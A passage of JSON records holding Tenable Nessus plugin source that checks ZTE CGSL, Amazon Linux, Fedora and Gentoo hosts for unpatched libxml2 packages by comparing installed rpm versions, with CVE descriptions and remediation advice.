MAIN 5.04, has libxml2 packages installed that are affected\nby multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82,\n allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products,\n allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2\n through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable\n to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite\n loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\n vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of\n service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict\n memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which\n allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0060\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL libxml2 packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ],\n 'CGSL MAIN 5.04': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:09:28", "description": "A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 when parsing invalid XPath expression. Applications processing untrusted XSL format inputs with the use of libxml2 library may be vulnerable to denial of service attack due to crash of the application. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. A use-after-free flaw was found in the libxml2 library. An attacker could use this flaw to cause an application linked against libxml2 to crash when parsing a specially crafted XML file. (CVE-2017-15412)\n\nThe xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data. A denial of service flaw was found in libxml2. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)", "cvss3": {}, "published": "2020-08-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : libxml2 (ALAS-2020-1415)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2-python26", "p-cpe:/a:amazon:linux:libxml2-python27", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2020-1415.NASL", "href": "https://www.tenable.com/plugins/nessus/139549", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2020-1415.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139549);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_xref(name:\"ALAS\", value:\"2020-1415\");\n\n script_name(english:\"Amazon Linux AMI : libxml2 (ALAS-2020-1415)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A NULL pointer dereference vulnerability exists in the\nxpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when\nparsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR\ncase. Applications processing untrusted XSL format inputs with the use\nof the libxml2 library may be vulnerable to a denial of service attack\ndue to a crash of the application. A NULL pointer dereference\nvulnerability exists in the xpath.c:xmlXPathCompOpEval() function of\nlibxml2 when parsing invalid XPath expression. Applications processing\nuntrusted XSL format inputs with the use of libxml2 library may be\nvulnerable to denial of service attack due to crash of the\napplication. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior\nto 63.0.3239.84 and other products, allowed a remote attacker to\npotentially exploit heap corruption via a crafted HTML page. A\nuse-after-free flaw was found in the libxml2 library. An attacker\ncould use this flaw to cause an application linked against libxml2 to\ncrash when parsing a specially crafted XML file. (CVE-2017-15412)\n\nThe xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly\ndetect compression errors, which allows context-dependent attackers to\ncause a denial of service (process hang) via crafted XML data. A\ndenial of service flaw was found in libxml2. A remote attacker could\nprovide a specially crafted XML or HTML file that, when processed by\nan application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to\ncause a denial of service (infinite loop) via a crafted XML file that\ntriggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\nvulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote\nattackers to cause a denial of service (memory consumption) via a\ncrafted LZMA file, because the decoder functionality does not restrict\nmemory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in\nGoogle Chrome before 52.0.2743.82, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via\nvectors related to the XPointer range-to function. (CVE-2016-5131)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2020-1415.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update libxml2' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python27\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-debuginfo-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-devel-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python26-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python27-2.9.1-6.4.40.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-static-2.9.1-6.4.40.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python26 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:08", "description": "Update to latest upstream release, includes several security related fixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "nessus", "title": "Fedora 25 : libxml2 (2017-a3a47973eb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1762", "CVE-2016-1833", "CVE-2016-1834", "CVE-2016-1835", "CVE-2016-1836", "CVE-2016-1837", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-4449", "CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-5969"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-A3A47973EB.NASL", "href": "https://www.tenable.com/plugins/nessus/99491", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a3a47973eb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99491);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-1762\", \"CVE-2016-1833\", \"CVE-2016-1834\", \"CVE-2016-1835\", \"CVE-2016-1836\", \"CVE-2016-1837\", \"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-4447\", \"CVE-2016-4448\", \"CVE-2016-4449\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-9318\", \"CVE-2017-5969\");\n script_xref(name:\"FEDORA\", value:\"2017-a3a47973eb\");\n\n script_name(english:\"Fedora 25 : libxml2 (2017-a3a47973eb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream release, includes several security related\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a3a47973eb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"libxml2-2.9.4-2.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:11:00", "description": "Update to latest upstream release, includes several security related fixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "nessus", "title": "Fedora 24 : libxml2 (2017-be8574d593)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1762", "CVE-2016-1833", "CVE-2016-1834", "CVE-2016-1835", "CVE-2016-1836", "CVE-2016-1837", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-4449", "CVE-2016-4658", "CVE-2016-5131", "CVE-2016-9318", "CVE-2017-5969"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-BE8574D593.NASL", "href": "https://www.tenable.com/plugins/nessus/99492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-be8574d593.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99492);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-1762\", \"CVE-2016-1833\", \"CVE-2016-1834\", \"CVE-2016-1835\", \"CVE-2016-1836\", \"CVE-2016-1837\", \"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-4447\", \"CVE-2016-4448\", \"CVE-2016-4449\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-9318\", \"CVE-2017-5969\");\n script_xref(name:\"FEDORA\", value:\"2017-be8574d593\");\n\n script_name(english:\"Fedora 24 : libxml2 (2017-be8574d593)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream release, includes several security related\nfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-be8574d593\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"libxml2-2.9.4-2.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:07:56", "description": "The remote host is affected by the vulnerability described in GLSA-201701-37 (libxml2: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user or automated system to process a specially crafted XML document, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-01-17T00:00:00", "type": "nessus", "title": "GLSA-201701-37 : libxml2: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1819", "CVE-2015-5312", "CVE-2015-7497", "CVE-2015-7498", "CVE-2015-7499", "CVE-2015-7500", "CVE-2015-7941", "CVE-2015-7942", "CVE-2015-8035", "CVE-2015-8242", "CVE-2015-8806", "CVE-2016-1836", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-2073", "CVE-2016-3627", "CVE-2016-3705", "CVE-2016-4483", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:libxml2", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201701-37.NASL", "href": "https://www.tenable.com/plugins/nessus/96541", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-37.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96541);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1819\", \"CVE-2015-5312\", \"CVE-2015-7497\", \"CVE-2015-7498\", \"CVE-2015-7499\", \"CVE-2015-7500\", \"CVE-2015-7941\", \"CVE-2015-7942\", \"CVE-2015-8035\", \"CVE-2015-8242\", \"CVE-2015-8806\", \"CVE-2016-1836\", \"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-2073\", \"CVE-2016-3627\", \"CVE-2016-3705\", \"CVE-2016-4483\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"GLSA\", value:\"201701-37\");\n\n script_name(english:\"GLSA-201701-37 : libxml2: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-37\n(libxml2: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in libxml2. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user or automated system to process a\n specially crafted XML document, possibly resulting in execution of\n arbitrary code with the privileges of the process or a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-37\"\n );\n script_set_attribute(\n 